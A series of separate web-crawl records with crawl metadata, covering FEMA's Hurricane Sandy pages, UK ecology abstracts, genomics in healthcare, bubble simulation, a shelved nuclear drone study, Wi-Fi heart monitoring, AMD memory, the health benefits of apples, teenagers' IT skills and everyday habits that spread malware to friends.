Disaster Recovery Center, and access to the state-specific disaster declarations. This information was also ultimately provided in 18 languages aside from English. Links were provided to all applicable state and local websites, and information was provided for those who want to help (donations and volunteering). As a direct response to lessons learned from Hurricane Katrina, the www.FEMA.gov/sandy page also contained two features that were part of a concerted effort to increase transparency around the U.S. government’s response to Sandy. The first was a timeline page, which provided a detailed chronology of the U.S. government’s response activities from October 22 through November 18, 2012. The second was a “Hurricane Sandy: By the Numbers” widget, which presented how many FEMA personnel were deployed in response to the disaster, how many assistance registrations had been received, how much had been approved in assistance dollars, and how many disaster recovery centers were open and their locations. From October 22 through December 31, 2012, Hurricane Sandy pages on FEMA.gov were viewed over 740,000 times, with over 7 million visitors coming to the site as a whole.
<urn:uuid:3e0bee55-139d-4504-981b-2a6cd91a48eb>
CC-MAIN-2017-04
http://www.nextgov.com/emerging-tech/emerging-tech-blog/2013/06/governments-hurricane-sandy-pages-play-play/64244/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279923.28/warc/CC-MAIN-20170116095119-00217-ip-10-171-10-70.ec2.internal.warc.gz
en
0.963726
1,162
3.046875
3
Monteith D.,Center for Ecology and Hydrology | Henrys P.,Center for Ecology and Hydrology | Banin L.,Center for Ecology and Hydrology | Smith R.,Center for Ecology and Hydrology | And 22 more authors. Ecological Indicators | Year: 2016 We characterised temporal trends and variability in key indicators of climate and atmospheric deposition chemistry at the twelve terrestrial UK Environmental Change Network (ECN) sites over the first two decades of ECN monitoring (1993-2012) using various statistical approaches. Mean air temperatures for the monitoring period were approximately 0.7. °C higher than those modelled for 1961-1990, but there was little evidence for significant change in air temperature over either the full monthly records or within individual seasons. Some upland ECN sites, however, warmed significantly over the first decade before cooling in the second. Summers at most sites became progressively wetter, and extremes in daily rainfall increased in magnitude. Average wind speeds in winter and spring declined at the majority of sites. Directional trends in summer precipitation could be linked to an atypically prolonged negative deviation in the summer North Atlantic Oscillation (NAO) Index. Several aspects of air quality improved markedly. Concentrations and fluxes of sulphate in precipitation declined significantly and substantially across the network, particularly during the earlier years and at the most polluted sites in the south and east. Precipitation concentrations of nitrate and ammonium, and atmospheric concentrations of nitrogen dioxide also decreased at most sites. There was less evidence for reductions in the loads of wet deposited nitrogen species, while trends in atmospheric ammonia concentration varied in direction and strength between sites. Reductions in acid deposition are likely to account for widespread gradual increases in the pH of soil water at ECN sites, representing partial recovery from acidification. Overall, therefore, ECN sites have experienced marked changes in atmospheric chemistry and weather regimes over the last two decades that might be expected to have exerted detectable effects on ecosystem structure and function. While the downward trend in acid deposition is unlikely to be reversed, it is too early to conclude whether the trend towards wetter summers simply represents a phase in a multi-decadal cycle, or is indicative of a more directional shift in climate. Conversely, the first two decades of ECN now provide a relatively stable long-term baseline with respect to air temperature, against which effects of anticipated future warming on these ecosystems should be able to be assessed robustly. © 2016 Elsevier Ltd. Source Rose R.,UK Center for Ecology and Hydrology | Monteith D.T.,UK Center for Ecology and Hydrology | Henrys P.,UK Center for Ecology and Hydrology | Smart S.,UK Center for Ecology and Hydrology | And 20 more authors. Ecological Indicators | Year: 2016 We analysed trends in vegetation monitored at regular intervals over the past two decades (1993-2012) at the twelve terrestrial Environmental Change Network (ECN) sites. We sought to determine the extent to which flora had changed and link any such changes to potential environmental drivers. We observed significant increases in species richness, both at a whole network level, and when data were analysed within Broad Habitat groupings representing the open uplands, open lowlands and woodlands. We also found comparable increases in an indicator of vegetation response to soil pH, Ellenberg R. Species characteristic of less acid soils tended to show more consistent increases in frequency across sites relative to species with a known tolerance for strongly acidic soils. These changes are, therefore, broadly consistent with a response to increases in soil solution pH observed for the majority of ECN sites that, in turn, are likely to be driven by large reductions in acid deposition in recent decades. Increases in species richness in certain habitat groupings could also be linked to increased soil moisture availability in drier lowland sites that are likely to have been influenced by a trend towards wetter summers in recent years, and possibly also to a reduction in soil nitrogen availability in some upland locations. Changes in site management are also likely to have influenced trends at certain sites, particularly with respect to agricultural practices. Our results are therefore indicative of widescale responses to major regional-scale changes in air pollution and recent weather patterns, modified by local management effects. The relative consistency of management of ECN sites over time is atypical of much of the wider countryside and it is therefore not appropriate to scale up these observations to infer national scale trends. Nevertheless the results provide an important insight into processes that may be operating nationally. It will now be necessary to test for the ubiquity of these changes using appropriate broader spatial scale survey data. © 2016. Source
<urn:uuid:2d93f2df-4323-4012-8b0d-8566b1adfef8>
CC-MAIN-2017-04
https://www.linknovate.com/affiliation/afbini-1855309/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285244.23/warc/CC-MAIN-20170116095125-00243-ip-10-171-10-70.ec2.internal.warc.gz
en
0.925491
946
2.671875
3
BOSTON—The cost of mapping an individual human genome is dropping logarithmically, from $100 million just 12 years ago to $5,000 today. Silicon Valley entrepreneurs hope to drive the price below $1,000, the cost of an MRI test, and within a decade it very well may be possible to conduct a whole genome sequence for every newborn at birth. Cynics point out that genome sequencing is the only healthcare cost actually going down, at a time when U.S. healthcare spending is projected to approach $3 trillion in 2013. But the research and analytics that results from such data is poised to change the way healthcare providers, insurance companies and pharmaceutical companies do business—if only everyone who has the information is willing and able to share it. Crowdsourcing One Possibility for Genomic Research A whole genome sequence can be cost effective, says Sandy Aronson, executive director for IT at the Partners HealthCare Center for Personalized Genetic Medicine, since it can be run once and then used across multiple "episodes of care." Aronson and others spoke at the recent Medical Informatics World conference. Today, clinicians can run 2,900 tests against a patient's genome, Aronson notes. The challenge is twofold, he adds: Knowing how to interpret the results of a test and, with a genome containing as many as 5 million variants, making sure nothing is missed. To address this, organizations must be prepared to "pre-position" IT infrastructure to take advantage of ever-changing genomics research and incorporate it into mainstream clinical care, Aronson says. On top of that, the industry needs to change regulatory and reimbursement frameworks, provide training for healthcare providers, payers and patients, and lean on society's resources. The latter could involve "highly structured crowdsourcing," he says, which places tests—of diseases, variants, pharmacological effects and others—in the context of patient phenotypes and family history. This augments a patient's record and can add further value with, for example, alerts that are triggered by certain test results. Such information is also of interest to insurance companies, says Dr. Lonny Reisman, senior vice president and chief medical officer for Aetna, as it offers the opportunity use "phenotypic manifestations" for predictive analysis of patient populations. This, in turn, can be applied to "value-based insurance design," which Aetna has used to waive co-pays for certain procedures or medications that offer proven long-term benefits to patients with heart conditions, Reisman say. For Patients to See Value, Data Must Flow Both Ways Even with waived co-pays, the patient compliance rate remains less than 50 percent, Reisman says. This points to a larger concern in the healthcare industry: Improving patient engagement. For Aronson, Reisman and others speaking at Medical Informatics World, better information sharing will lead to better patient engagement. Dr. Mark Davies, executive medical director of the Health & Social Care Information Centre within Britain's National Health Service, says physicians should have an "adult" relationship with patients—one that makes them feel like they're part of an equal partnership. This, in turn, must be coupled with a "bidirectional flow of insight" among patients, providers and patients, Reisman says. The benefit is bidirectional, too. Patients have better access to more robust personal health information, while patient-reported outcome measures can be used for quality, accountability and transparency improvement initiatives, Davies says. For this to succeed, though, there must be a clear value for patients. Right now, unfortunately, that isn't the case, says Dr. John Halamka, CIO at Boston's Beth Israel Deaconess Medical Center. While the U.S. government's meaningful use incentive program does require healthcare providers to offer technology that lets patients download, request and transmit data, there is little "value add" for personal health record or disease management applications, Halamka notes. In most cases, patients visit these apps once but don't come back. Poor usability and functionality are often to blame, Halamka says. "Go build apps that provide value." Predictive Modeling Is Where the Value Is For Julie Meek, clinical associate professor in the Indiana University School of Nursing, that value is in predictive modeling. Bringing together demographics, billing and pharmacy claims, lab test results, patient-supplied data and genomic research—and then incorporating it all into the clinical workflow via an EHR system—gives patients a much better sense of the health indicators than the height, weight, blood test and urine test of the annual physical ever could. The key is making sure that no data sets are missed. Meek's predictive modeling—which is more than just an exercise in data mining, she says, because it incorporates logistic regression and model validation—considers 39 separate variables. Many stick to age and gender data, as both are readily available, but, as Meek puts it, "Cheap data is no substitute for legitimate inquiry." She advocates such a comprehensive approach to population health management because the status quo isn't cutting it. Twenty percent of Medicare patients who are hospitalized are subsequently readmitted within 30 days—and many, for whatever reason, don't follow up with a physician in between hospital visits. This is costly and inefficient. Determining who will come back isn't easy— John D'Amore, founder of clinical analytics software vendor Clinfometrics, says this analysis must take into account 60 variables—but it can be done. Take a group of 15 patients being discharged from the hospital and, D'Amore says, you can identify the five at the highest risk of being readmitted. That's important because, in that group of 15, 74 percent of the readmissions come are one of those five patients, he says. Genomics Research Allows for 'Precision Medicine'—If Data's Available The data that's gleaned from genomics research could play an increasing role in this type of modeling, whether it's reducing readmission rates or researching cancer in the name of "precision medicine" that's tailored to individual patients' needs. It's could and not will because, while Davies says "we have some fantastic technology out there" to first conduct and then share genomic research, a mix of professional, personal and cultural factors combine to make data dissemination difficult. Patients fear that data will be sold to pharmaceutical or life sciences firms, while researchers and providers persist in creating data silos. What's needed, Aronson says, is a more detailed regulatory framework that can address data privacy as well as genomic data use case standards. From a care-coordination and knowledge-sharing standpoint, primary care physicians, specialists and genetic researchers have to be connected. (However, Halamka points outs, health information exchange is no easy task, as each U.S. state and territory has different data sharing standards; what's legal in Massachusetts may be illegal in neighboring New Hampshire.) There's also an educational component at the caregiver level, Aronson adds. Families need to understand the importance of sharing genomic information. Or, as Davies says, the industry needs to know that "failure to share data kills people."
<urn:uuid:0891da5f-ad03-4f84-99aa-b57f8f0b5d20>
CC-MAIN-2017-04
http://www.cio.com/article/2386333/healthcare/how-genomic-research-could-improve-healthcare.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281084.84/warc/CC-MAIN-20170116095121-00208-ip-10-171-10-70.ec2.internal.warc.gz
en
0.939015
1,497
2.5625
3
Supercomputers at the Department of Energy’s National Energy Research Scientific Computing Center (NERSC) have worked on important computational problems such as collapse of the atomic state, the optimization of chemical catalysts, and now modeling popping bubbles. Using the NERSC’s Hopper Systems, UC Berkeley mathematicians Robert Saye and James Sethian combined four sets of equations governing the decay of individual bubbles into a singular model. “Modeling the vastly different scales in a foam is a challenge, since it is computationally impractical to consider only the smallest space and time scales,” Saye said in explaining the difficulties of modeling bubbles. So why dedicate valuable supercomputing resources to the seemingly trivial problem of popping bubbles? For one, bubble decay actually resembles the decay of radioactive particles. Bubbles pop at random yet expected intervals, meaning it is known how many bubbles in a group are to disintegrate over time but it is uncertain which bubbles those are. Understanding why a particular bubble pops when it does through modeling the intense set of equations could potentially provide insight into the decay of much smaller individual particles. Further, the studying bubbles already leads to a real-world application in that chemical engineers frequently work with substances that foam. “Today the chemical engineer faced with designing such [a] plant must rely on extrapolation from experience, and guesswork,” said Denis Weaire, physicist at Trinity College. “To do better we need realistic models. They could arise out of calculations like this.” To perform the calculations and generate the model, Saye and Sethian discovered the process could be broken into four distinct layers of differential equations. One set described the draining of liquid from the bubble, a process that eventually leads to a bubble’s popping. A second set modeled the flow of liquid among bubbles while a third described the bubble wobble after one pops that can be aptly seen in the generated model below. The fourth set dealt with the optics, describing how the mechanics and chemical makeup explains the interference that sometimes results in rainbows. “We developed a scale-separated approach that identifies the important physics taking place in each of the distinct scales, which are then coupled together in a consistent manner,” Saye said. After the parameters were set, it took the supercomputers at NERSC five days to run the computations and generate the model. “This work has application in the mixing of foams, in industrial processes for making metal and plastic foams, and in modeling growing cell clusters,” said Sethian. “These techniques, which rely on solving a set of linked partial differential equations, can be used to track the motion of a large number of interfaces connected together, where the physics and chemistry determine the surface dynamics.” As Sethian noted above, the work promises practicality in various real-world applications, including the aforementioned research in foams as well as in the life sciences. A problem that displays decay properties and shares surface interactions with fellow decaying objects can utilize the methods championed here by Sethian and Saye.
<urn:uuid:881c8c6e-3185-4034-9ca9-ec2397b4c632>
CC-MAIN-2017-04
https://www.hpcwire.com/2013/05/15/computing_the_physics_of_bubbles/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281084.84/warc/CC-MAIN-20170116095121-00208-ip-10-171-10-70.ec2.internal.warc.gz
en
0.934822
637
3.8125
4
The U.S. military has apparently shelved the idea of developing a nuclear-powered drone aircraft that would be capable of staying in the air for months, but would pose so great a risk of those it might crash on that it was canceled due to "political conditions." The project, allegedly underway at Sandia National Laboratories as part of a series of efforts to increase the duration of UAV flying time from "days to months," while increasing the amount of electricity available onboard by at least 200 percent, according to a June, 2011 summary of the project from Sandia. The story broke after Steven Aftergood, an electrical engineer who works for the Federation of American Scientists, published the summary on his FAS blog Secrecy News. The blog reports on changes in government policy on secret information and access to official records that are hidden, suppressed or difficult to find. According to the summary of "Unmanned Air Vehicle Ultra-Persistence Research" (PDF), Sandia and Northrup Grumman collaborated on a project to reduce or eliminate restrictions on flight time due to fuel use and to make enough electricity available to drive high-power avionics, "payload systems" such as electronic countermeasure systems that jam radar or communications, or surveillance equipment to eavesdrop on cell-phone calls. The two were also responsible for making communication with the drones more reliable. Several drones are lost both in testing and in combat areas every year after the radio connection between controller and drone was broken. Most famously, a CIA-operated version of America's most-advanced production UAV, the RQ-170 Sentinel crashed 140 miles inside Iran after the operators reportedly lost the radio signal that allowed them to control it. During the project, engineers evaluated eight technologies to produce heat, three to convert power, two dual-cycle propulsion systems and one electrical generator, for UAVs of varying sizes. Long-range UAVs would eliminate the need for many forward bases, most of the logistically complex process of refueling a plane in flight and reducing the high maintenance requirement for UAVs based near war zones. The project was largely successful, though only theoretically. All the work was done on CAD/CAM machines and using process analysis to estimate the impact on supply chains, the need for surveillance systems and other resources. No systems were actually built, but the designs themselves passed at least the first few stages of analysis estimating effectiveness and cost-effectiveness that would have qualified it to be considered for development. "As a result of this effort, UAVs were to be able to provide far more surveillance time and intelligence information while reducing the high cost of support activities," the summary read. "This technology was intended to create unmatched global capabilities to observe and preempt terrorist and weapon of mass destruction (WMD) activities. “Unfortunately, none of the results will be used in the near-term or mid-term future,” the project summary stated. “It was disappointing to all that the political realities would not allow use of the results." – Sandia/Grumman Cooperative Research and Development Agreement (#1714),quoted in Secrecy News, March 22, 2012 Beating around a very dangerous bush The report never actually uses the word "nuclear," though the lead investigator is a specialist in nuclear propulsion and phrases such as "propulsion and power technologies that [go] well beyond existing hydrocarbon technologies," and references to the decommissioning and disposal of fuel make clear that "there is little doubt about the topic under discussion," Aftergood wrote. Despite coming up with design ideas they thought would work, the study's authors appear not to have thought very seriously about whether or how they could ever get a nuclear-powered drone even one step off the drawing board. "The results will not be applied/implemented," they wrote, blaming unfavorable "political conditions" for not giving the little nuclear UAV its chance. The report didn't say the political conditions were the kind that would result if an American nuclear-powered drone ever wandered away from its handlers and crashed in Iran, for example, where the government would be even more happy to receive the gift of American nuclear-fission generators than they were to receive a nearly intact version of its latest UAV. Sandia didn't deny the existence of the project summary or specifically deny that nuclear propulsion might be involved (though it didn't confirm anything, either). It issued a statement saying researchers at Sandia do a lot of work on very advanced technologies, often simply to explore the possibilities rather than as an earnest effort to produce as a weapon every question they try to solve or prototype they try to build. "The research on this topic was highly theoretical and very conceptual. The work only resulted in a preliminary feasibility study and no hardware was ever built or tested. The project has ended." The project ended in 2009, which is a good thing. The Sentinel didn't go down until two years later. It would have been a shame if it had taken Sandia's new power plant with it. Read more of Kevin Fogarty's CoreIT blog and follow the latest IT news at ITworld. Follow Kevin on Twitter at @KevinFogarty. For the latest IT news, analysis and how-tos, follow ITworld on Twitter and Facebook.
<urn:uuid:d838df76-2eaa-469e-9b49-bb945fe04028>
CC-MAIN-2017-04
http://www.itworld.com/article/2728406/security/u-s--decides-against-making-crash-prone-drones-run-on-nukes.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00510-ip-10-171-10-70.ec2.internal.warc.gz
en
0.968203
1,096
2.703125
3
University of Utah researchers have found even more ways to use all those pings coming from a Wi-Fi hotspot. On top of being able to see through walls, they've found a way to use a wireless network to monitor a person's heart rate. The group of engineers, led by assistant professor of electrical engineering Neal Patwari, rigged their system together by surrounding a hospital bed with 20 wireless transmitters on a 2.4GHz band. The system was able to detect a person taking 0.4 to 0.2 breaths per minute based on only 30 seconds data, whereas most monitors round off to the nearest full breath-per-minute. The experimental system also passed its accuracy test against a carbon dioxide monitor connected to the patient's nostrils by tubes. Unlike current heart monitors, a Wi-Fi based monitoring system is also much more comfortable for the patient than having a wire taped to a finger-mounted sensor. Of course, thios new system has a few caveats. If the patient moves, the system will detect the movement in place of their heart rate. The system also needs a minimum of 13 wireless transmitters, but the error rate drops to zero when 19 nodes are in use. The system could be used to monitor a host of heart related illnesses including heart disease, sleep apnea, or babies at risk for sudden infant death syndrome. It's cheap, too, as the system can be made with typical, commercially available wireless hardware. Patwari and his team are exploring different or multiple radio frequencies that could make their system more accurate or capable of monitor two people breathing at different rates. The researchers estimate that the technology could make its way into homes in the next 5 years. The system could be used by the military or SWAT to detect the number of heartbeats inside a building. Like this? You might also enjoy... - Hate The New Facebook? Here's How to Change It - Mechatronic Security Robot Is Remarkably Formidable - Screw It: AudioBulb Wireless Speaker System as Easy as Twisting in Light Bulbs This story, "University develops WiFi network that monitors hearts" was originally published by PCWorld.
<urn:uuid:c93a1a4c-3873-4559-8876-4ce8037acf00>
CC-MAIN-2017-04
http://www.itworld.com/article/2737259/networking/university-develops-wifi-network-that-monitors-hearts.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00446-ip-10-171-10-70.ec2.internal.warc.gz
en
0.955007
444
2.96875
3
AMD Eyes Chip Memory Expansion The chip maker has licensed new technology that could help boost its chips' onboard memory.Advanced Micro Devices Inc. is exploring new types of onboard memory for its chips as a way to bump performance and squeeze more out of its manufacturing plants. The Sunnyvale, Calif., chip maker has licensed memory technology called Z-RAM, created by startup Innovative Silicon Inc., of Santa Clara, Calif., in an effort to look at new ways of bumping up the cache or onboard memory of its processors. Z-RAM, which stands for zero-capacitance dynamic RAM, promises the ability to double the density of DRAMused to store dataor quintuple that of static RAMused for processor cacheswithout requiring special materials or extra manufacturing techniques when being fabricated, according to Innovative Silicon officials. Although its still in the early stages of working with Z-RAM, AMD believes the technology could help it reduce the area that cache memory occupies inside its chips. Changing the sizes its caches take up could either allow it to reduce a chips overall area, referred to as its die size, or add more memory but keep its size the same. Because the wafers chip makers use to turn out chips are a finite sizemost chip makers, including AMD, are now moving to 300MM diameter wafersthe smaller each chip is, the greater numbers it can be manufactured in. Thus smaller chips also cost less to make.
<urn:uuid:5a05d697-dfd8-4de5-9be6-647b60174525>
CC-MAIN-2017-04
http://www.eweek.com/c/a/Desktops-and-Notebooks/AMD-Eyes-Chip-Memory-Expansion
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00264-ip-10-171-10-70.ec2.internal.warc.gz
en
0.943648
292
2.734375
3
Apple Fruit - Information & Facts about the Wonder Fruit Apple Most of us are familiar with the tale that originated from Switzerland of William Tell when an Apple was placed on the head of his son and Tell was ordered to split the apple with his arrow or lose his son. Of course Tell succeeded in piercing the apple into two and saved his son. Again we have heard of Adam's apple. The story goes that in the Garden of Eden, Adam ate a piece of the forbidden fruit that got stuck in his throat, and thus the term Adam's Apple. An Adam's apple sometimes looks like a small, rounded apple just under the skin in the front of the throat, usually seen in boys. Now let's have some interesting facts about Apples and how they aid in good health. Apple Fruit Facts The Greek and Roman mythology refer to apples as symbols of love and beauty but Apple Fruit contain vitamins like Vitamin C, Beta-Carotene, iron and potassium etc., The Vitamin C content may not be as good as Oranges but apples have very high mineral contents, pectins, malic acid which are good in normalizing the intestines. Apple Fruit is good for treatment of anaemia, dysentery, heart disease, headache, eye disorders, kidney stones and promotes vigour and vitality. Apple juice is good to overcome a liverish feeling, further, apples are unlikely to cause allergic reactions and are excellent means of providing essential fluids to the body. A popular saying about apples is that apples combine the best attributes of something old and something new. A number of components in apples, have been found in studies to lower blood cholesterol with a reduced risk of ischemic heart disease, stroke, prostrate cancer, type II diabetes and asthma. A new study whose findings have been published in the Journal of Alzheimer's Disease is sure to bring cheers for people suffering from this strange disease. This study suggests that eating and drinking apples and apple juice, in conjunction with a balanced diet, can protect the brain from the effects of oxidative stress and that we should eat such antioxidant-rich foods. Apples are also good for treatment of the Acid reflux condition also called gerd (gastro esophageal reflux disease). It is well said that we should have in our diet apart from vegetables, fresh coloured fruits like Yellow Apples, Green Apples, Red Apples etc., which are easily available considering that we have some of the best Apples coming from places like Kashmir, Himachal Pradesh etc., Of course imported apples like Washington apples and Australian apples are available at big departmental stores. Some of the well known apple fruit varieties are Golden Noble, Bramleys etc., As in vegetables like carrot, the colours in fruits like Apples are indicative of good health as shown below: - Green Apples - Good for strong bones and teeth, aids in vision, anti cancer properties. - Yellow Apples - Good for heart and eyes, immune system, reduce risk of some cancers. - Red Apples - Good for heart, Memory function, lower risk of some cancers and to maintain urinary tract health. So lets seize the opportunity to grab as much apples as we can in our diet for good health for the whole family. This list is based on the content of the title and/or content of the article displayed above which makes them more relevant and more likely to be of interest to you. We're glad you have chosen to leave a comment. Please keep in mind that all comments are moderated according to our comment policy, and all links are nofollow. Do not use keywords in the name field. Let's have a personal and meaningful conversation.comments powered by Disqus
<urn:uuid:3dfc921a-e059-4d41-92bc-3799dc5763f2>
CC-MAIN-2017-04
http://www.knowledgepublisher.com/article-462.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279468.17/warc/CC-MAIN-20170116095119-00108-ip-10-171-10-70.ec2.internal.warc.gz
en
0.956205
753
2.5625
3
Another Decision Analysis tool is called an influence diagram. It provides a graphical presentation of a decision situation. It also serves as a framework for expressing the exact nature of relationships. The term influence refers to the dependency of a variable on the level of another variable. An influence diagram maps all the variables in a management problem. Influence diagrams use a variety of geometric shapes to represent elements. The following conventions for creating influence diagrams were suggested by Bodily (1985) and others. The three types of variables are connected with arrows that indicate the direction of the influence. The shape of the arrow also indicates the type of relationship. Preference between outcome variables is shown as a double-line arrow. Arrows can be one-way or two-way (bi-directional). Influence diagrams (see Figure 9.4) can be constructed at any degree of detail and sophistication. This type of diagram enables a model builder to remember all of the relationships in the model and the direction of the influence. Several software products are available that help users create and implement influence diagrams. Some products include: DAVID that helps a user to build, modify, and analyze models in an interactive graphical environment; and DPL (from ADA Decision Analysis, Menlo Park, CA) that provides a synthesis of influence diagrams and decision trees.
<urn:uuid:4239bd33-33db-4ccb-9dc4-123349d7b808>
CC-MAIN-2017-04
http://dssresources.com/subscriber/password/dssbookhypertext/ch9/page16.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280266.9/warc/CC-MAIN-20170116095120-00016-ip-10-171-10-70.ec2.internal.warc.gz
en
0.904841
263
3.671875
4
As IT Professionals, we’ve seen technology change very rapidly over the past 10 years. We’ve managed to keep pace and learn new skills on the job or through training courses. What might surprise you are the skills that high school kids possess today. Here is a look at some skills that many high school kid have — do you? Blogging in one form another has been around since the early 90’s. The term blog was used by Peter Merholz in 1999. It seems everyone has a blog of one sort another. In many cases, it is a random collection of thoughts and opinions on various subjects. Blogging has become a way for people to be heard in a forum that allows them to express themselves in a “safe” place. Blogs can also be used to offer advice on some piece IT equipment or answer questions posed by others. Why Linux one might ask? The popularity of Linux lies in the fact that it is easily customizable, that it can be installed on just about on any system, and, perhaps most importantly, it is open source (read free). Linux is free — you can copy and distribute it without fees or royalties. The source code for Linux is available to anyone who wants to download the installation files from the internet. It is really surprising just how many Linux systems are owned and maintained by teenagers for just these reasons. What you might also be surprised to know is that there is an excellent productivity suite called OpenOffice.org. This should not come as a surprise — especially for open source programming languages such as Perl, PHP, Python, and Ruby. While not necessarily writing applications for an enterprise environment, still, applications are being written. Where might these applications be available? Why not look at any one of the common “store fronts” for smart phones? Or how about drivers for hardware devices in Linux? Game Consoles and On-Line Games Not really IT skills as such — but it is still something that a lot of teenagers use on a daily basis. In some cases, modifications are made to the consoles to “enhance” game play. Now mind you — most of these mods are usually against the End User License Agreement (EULA). Even given this, there are a number of ingenious modifications that have been made including larger hard drives, open-source operating systems and more. Some of the on-line games such as World of Warcraft (WoW) and Rift are almost worlds unto themselves and have their own language and “culture”. Those who play these games share a common set of game (IT) skills. Again, these are not IT skills that adults might be accustomed to, but when WoW has an estimated game population in excess of 10 million people, there must be some kind of knowledge transfer between the game players. There was a time when teenagers would tinker with cars. Now many teens are tinkering with their computers. There are many things that can be done to improve the performance of a computer, and teens are readily adept at doing such — from overclocking the CPU to enhanced cooling methods and even designing and building computer cases. Today’s teens are incredibly innovative (well, so were those who had the old Commodores, we just had less hardware we could work with) Texting has become controversial lately due to people driving and texting at the same time — not a good idea. Many mobile calling plans have a texting package where you can send 5000+ text messages a month (a mere 166 messages a day or so). How many texts do high schoolers send on an average day? According to one study “nearly one out of three kids between 13 and 17 years old send over a 3339 texts a month.” Texting has rapidly become the primary means of communication to the point where actual phone usage has dropped (though data usage has increased). How many texts does the average adult send? — a mere 10 per day. Now my question to you is: DY knw h2 uz txt msgN? If not, then follow this link and see: http://www.lingo2word.com/translate.php Why tweet (or retweet)? A tweet is a post or status update on Twitter. A tweet is a microblog that is used on Twitter (a microblogging service). Each tweet can only be 140 characters or less — so using twitter is as much about messaging as it is about being creative with your tweet (and maximizing what your 140 characters display). Tweeting is gaining popularity with the younger user base — just not as quickly as with texting. Tweets are broadcast out to everyone who is following your tweets whereas teens are mainly interested in socializing with their friends. This one came up a lot and for a variety of reasons. Creating web sites is still in strong demand even though there are numerous places where one can design and publish your own website. This is an excellent way for creative high school students to learn invaluable IT skills and potentially earn some money. Along with the ease of creating websites has come the ability to create multi-media clips. These are finding their way onto YouTube and other sites. Ok, I know, EVERYONE is using Facebook — but included in this audience are high schoolers. I doubt that they are using Facebook to get in touch with old school mates but rather to maintain contact with current friends and, especially, current activities. Are some playing the games found in Facebook? Of course, otherwise we wouldn’t be inundated with requests to play a game so that the invitee can access new levels or features. Yes, that’s right, tech support. I don’t mean technical support at the enterprise level, but teenagers are providing technical support for their families. In many cases, their assistance is used for churches and non-profit organizations that don’t have the wherewithal to hire an IT consultant. Some schools have used their more IT inclined students for assistance (not for the production computers, of course, but for lab PCs). This IT tech support help also carries over to helping their friends’ computers (and other hardware devices — think wireless, routers and home networks. Home networks and streaming media are another area where you find a younger crowd more involved. What is surprising here is not that high school students are IT savvy, but to what extent and breadth their knowledge extends. It is remarkable seeing how quickly a teenager can figure out the inner workings of a smartphone while the adult fumbles learning just how to turn the phone on in the first place. I want to thank Christopher Jenkins whose help was invaluable for this article.
<urn:uuid:41c951e8-ffba-4019-a7d6-90f63b5ecee2>
CC-MAIN-2017-04
http://blog.globalknowledge.com/2011/07/01/10-it-skills-that-todays-high-school-kids-have-do-you/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00502-ip-10-171-10-70.ec2.internal.warc.gz
en
0.964124
1,364
2.890625
3
A lot has been said over the years about the best ways to protect your machine from attacks and malicious code. But where do those recommendations intersect with ways to protect your friends from attacks? By failing to protect your own data, you’re sometimes putting them at risk as well. Here are a few ways people end up mindlessly spreading the malware love. 1. Neglect to Scan That File Before You Share It That spreadsheet you shared with your friends to organize a summer beach trip could end up bringing with it some unexpected cooties. But a quick once-over with an up-to-date antivirus scanner will help keep your trip relaxing. 2. Pick Up Abandoned USB Keys and Use/Share Them Would you pick up and use a comb someone dropped in the parking lot? Probably not – who knows what sorts of grossness could be lurking on it! But not everyone is so fastidious about their digital hygiene. A shocking number of people in one study picked up a “lost” USB drive in a parking lot. Ewh. Even experts are not immune. And then to share it with your friends? Totally uncouth. USB sticks are considered an infection vector unto themselves, as many Windows-based threats will attempt to run automatically upon inserting the drive. While it may not affect you, it may get your friends. 3. Click on Every Stupid Link on Facebook OMG, your best friend from the 3rd grade just posted something that offers a free ticket to a tropical, sunny location just for clicking on a link! Who could it possibly harm to try it? Sometimes those scams come with more than you bargain for, and you could in fact be putting your friends’ data up for grabs by clicking that link. Be skeptical of links that seem shocking or potentially scammy. Ask them if they intended to post the link if you really feel inclined to click. 4. Fall for Phishing Scams It’s tough when phishing emails are getting increasingly sophisticated and adept at making scary claims about what will happen if you don’t click that link. But it’s always a good idea to verify before you trust. Since the aim of phishing is in part to steal your contact data so they can hit your friends too, there’s more on the line than just your own data. If you receive an email from any of your accounts (social, financial, or otherwise) saying that you need to click a link and access your account, you can indeed check your account to be safe, but never do it via a link in email. Go directly to your browser and type in the address for the site. 5. Use a Weak Password on Your Email/Social Networking Accounts This is much the same idea – your password doesn’t just protect access to your account, but access to your friends’ data as well. Choose unique, strong passwords and change them often, or just use a password manager that will do the heavy lifting for you. (After all, the most secure password is the one you don’t know.) 6. Break into Your Neighbors’ WiFi It’s tempting, as more and more people get WiFi routers at home, to simply poach your neighbor’s bandwidth and save yourself that few bucks a month. But you really don’t have any idea what their level of protection is. I attempted this once on a sacrificial research machine, for the sake of curiosity and science, and the machine was infected almost immediately. That blew even my jaded, professionally paranoid mind. If you then have friends over that connect into your network, you could be putting them at risk, too. 7. Install Pirated Software on Your Friends' Computer Oh, the digital hygiene horror! This is the InfoSec equivalent of having a dinner party to share your “freegan," dumpster-diving haul. It’s one thing to take your chances with your own intestinal tract or computing device, but it’s another thing entirely to share that with your friends. Warez is a popular way for malware authors to spread their wares, as many people still believe you can get something for nothing without realizing the potential consequences. 8. Be Lazy About Updating Your WordPress Installation Your friends love your blog about designer dog sweaters, but it’s not yet caught on with the general public. So who needs to get around to updating it with the latest and greatest WordPress version? It’s precisely that problem (okay, maybe not the dog sweater part) that led to the explosion of Flashback. Lots of people with old blogs got compromised, and their friends and fans paid the price. It only takes a little thought and effort to avoid common ways for spreading malware. The investment is far less than it would take to write sincere, contrite apology emails to your friends and family members who had to deal with the virtual crud they got from you. - Are You Sabotaging Your Own Security Efforts? - 6 Ineffective Ways to Protect Yourself Against Online Attacks - Top 5 Ineffective Ways to Protect Yourself From Government Surveillance USB stick photo credit: Count_Count via photopin cc Facebook scam screenshot via CNET 